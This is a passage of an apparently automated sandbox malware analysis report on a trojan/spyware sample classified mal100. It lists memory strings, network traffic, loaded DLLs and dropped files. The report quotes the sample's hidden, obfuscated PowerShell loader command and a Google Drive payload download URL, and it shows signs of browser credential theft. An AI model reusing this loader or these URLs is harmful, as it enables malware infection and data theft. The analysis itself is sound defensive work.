            Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3826784602.00000000252A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k
            Source: msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3knz
            Source: msiexec.exe, 0000000B.00000003.2685537438.000000000A195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A18E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A18E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59376 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59391 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59374 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59378
            Source: unknownNetwork traffic detected: HTTP traffic on port 59386 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59374
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59373
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59376
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59370
            Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59391
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59371
            Source: unknownNetwork traffic detected: HTTP traffic on port 59388 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59390
            Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59371 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59373 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59390 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59389
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59388
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59384
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59386
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59380
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59382
            Source: unknownNetwork traffic detected: HTTP traffic on port 59389 -> 443
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59370 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:59371 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:59389 version: TLS 1.2
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405421

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004033B6
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeFile created: C:\Windows\resources\unthick.iniJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004068471_2_00406847
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_00404C5E1_2_00404C5E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFD27811_2_02DFD278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF536211_2_02DF5362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFC1A311_2_02DFC1A3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFC73811_2_02DFC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFC46811_2_02DFC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFCA0811_2_02DFCA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFE98811_2_02DFE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFCFA911_2_02DFCFA9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFCCD811_2_02DFCCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF3AA111_2_02DF3AA1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF39ED11_2_02DF39ED
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF29EC11_2_02DF29EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF69A011_2_02DF69A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFE97B11_2_02DFE97B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DFF97411_2_02DFF974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF3E0911_2_02DF3E09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF6FC811_2_02DF6FC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF9DE011_2_02DF9DE0
            Source: r5yYt97sfB.exeStatic PE information: invalid certificate
            Source: r5yYt97sfB.exe, 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameharbinger.exeJ vs r5yYt97sfB.exe
            Source: r5yYt97sfB.exeBinary or memory string: OriginalFilenameharbinger.exeJ vs r5yYt97sfB.exe
            Source: r5yYt97sfB.exe.5.drBinary or memory string: OriginalFilenameharbinger.exeJ vs r5yYt97sfB.exe
            Source: r5yYt97sfB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@5/5
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004033B6
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004046E2
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_00402095 CoCreateInstance,1_2_00402095
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeFile created: C:\Users\user\AppData\Local\magmaetJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsd6439.tmpJump to behavior
            Source: r5yYt97sfB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F9E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F92000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F5E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F6C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025F4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: r5yYt97sfB.exeVirustotal: Detection: 71%
            Source: r5yYt97sfB.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeFile read: C:\Users\user\Desktop\r5yYt97sfB.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\r5yYt97sfB.exe "C:\Users\user\Desktop\r5yYt97sfB.exe"
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeFile written: C:\Windows\Resources\unthick.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: r5yYt97sfB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 0000000B.00000002.3798575873.00000000043F8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
